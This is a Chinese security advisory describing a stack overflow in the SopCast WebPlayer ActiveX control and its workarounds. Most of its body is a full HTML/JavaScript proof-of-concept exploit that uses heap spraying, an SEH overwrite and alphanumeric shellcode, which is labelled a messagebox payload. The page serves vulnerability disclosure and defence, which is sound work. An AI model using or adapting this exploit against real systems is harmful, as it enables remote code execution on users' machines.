安全研究

安全漏洞
SopCast WebPlayer ActiveX控件SetSopAddress方式栈溢出漏洞

发布日期:2010-08-11
更新日期:2010-08-19

受影响系统:
Sopcast SopCast WebPlayer ActiveX 3.2.9
描述:
CVE(CAN) ID: CVE-2011-5044

SopCast WebPlayer是免费的在线流媒体播放软件。

SopCast WebPlayer ActiveX控件(sopocx.ocx)没有正确地处理超长的ChannelName属性值,用户受骗访问了恶意网页并获得了超长的sop:// URL字符串就可以触发栈溢出,导致执行任意代码。

<*来源:Sud0
  
  链接:http://secunia.com/advisories/40940/
        http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-059-sopcast-unicode-bof-remote-exploit/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>  

<Center>  

<H1>Sopcast POC by Sud0<br></H1>  


</Center>  


<object classid='clsid:8FEFF364-6A5F-4966-A917-A3AC28411659' id='boom' ></object>  

<script>  

// ######################################### Begin of spraying with (nops + Pop/Pop/Ret) instructions to come back to the stack  

  

var nops = unescape("%49%41");  // some nice nops on ECX  

var ppr = unescape("%49%58%49%58%49%c3");  // Pop EAX / pop EAX / Ret  

var ppraddy = 0x20260078;  

var BlockSize = 0x200000;  

var BlockHeaderSize = 0x26;  

var PPRSize = 0x6;  

var nopSize = BlockSize - (PPRSize + BlockHeaderSize);  

var heapBlocks = (ppraddy+BlockSize*2)/(BlockSize*2);  

var Spray = new Array();  

  while (nops.length<nopSize)  

    {  

    nops += nops;  

    }  

nops = nops.substring(0,nopSize);  

  for (i=0;i<heapBlocks;i++)  

   {  

    Spray[i] = nops +  ppr;  

   }  

// ######################################### end of spraying  

  

      var buffSize = 522;   // (516 + 6 = sop:// )offset to overwrite EIP  

      var x="sop://";  

    while (x.length<buffSize) x += unescape("%41");  

    x+=unescape("%41");  

    x+=unescape("%41");  

    x+=unescape("%87");  //low unicode bytes of seh destination address 0035 (0x20260087)  

    x+="&#133;";  //High unicode bytes of seh destination address 2026 (0x20260087)  

    x+=unescape("%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49");  

      x+=unescape("%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A");  

      x+=unescape("%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49");  

      x+=unescape("%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%52%49%c3");  

  

// some junk before shellcode  

for (i=0;i<330;i++)  

   {  

    x+=unescape("%41");  

   }  

  

// messagebox shellcode  

x+="RRYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIA";  

x+="IQI111AIAJQYAZBABABABABkMAGB9u4JBfyjK3kXYRTLdKDNQyBx2pzlqGYS4DKPqlpBkQfzl2kpvMLTKq6LH4KqnmP";  

x+="TKMfNXNoLXrUL3Ny9qXQKOYQc0bkplo4nDrk15oLTKPTKUD8KQXj2kMzlX4K1JkpyqjK7sp7OY4KMdtKKQZNLqIomaw";  

x+="PilVLRdWPBTlJ6a6olMJawWHil1YoKOKOmk3LKtMXSEgnRkojO4YqZK0fBkzlpKRkqJKlm1JKdKitRkkQxhe9oTLdML";  

x+="31es6RKXKywdsY9UCYfbOx2npNZnzLpR8h5LkOKOkOQyQ5kT5kSNj8yRBSSWmLo4nrxhdKKOKOKOe9oUkXoxRLplMPK";  

x+="O1XLsnRnNs41Xaet3REbRQx1LmTkZSYK6pVKOPULDqyWRPPWKSxg2Nm5lQwklktPRYXqN9okOYo38PlaQPnQH2HPCrO";  

x+="2RqUNQ9KrhqLMTlG1yGsQXnPpXkpKp1XKpNs45s4OxQTmPOrQiQXpoOysDouQXMucHRPPllqWYrhPLktKaQy7qNQ6rN";  

x+="rpSpQqBkOvpNQgPB0ioNuyxkZA";  

  

// some junk after shellcode  

for (i=0;i<40000;i++)  

   {  

    x+=unescape("%41");  

   }  

  

// calling the boom  

    boom.ChannelName=x; // setting channel name  

    boom.SetSopAddress(x); // getting address to trigger the boom  

  

</script>  

</html>

建议:
临时解决方法:

* 为clsid: 8FEFF364-6A5F-4966-A917-A3AC28411659设置kill bit。

厂商补丁:

Sopcast
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.sopcast.org/

浏览次数:3108
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客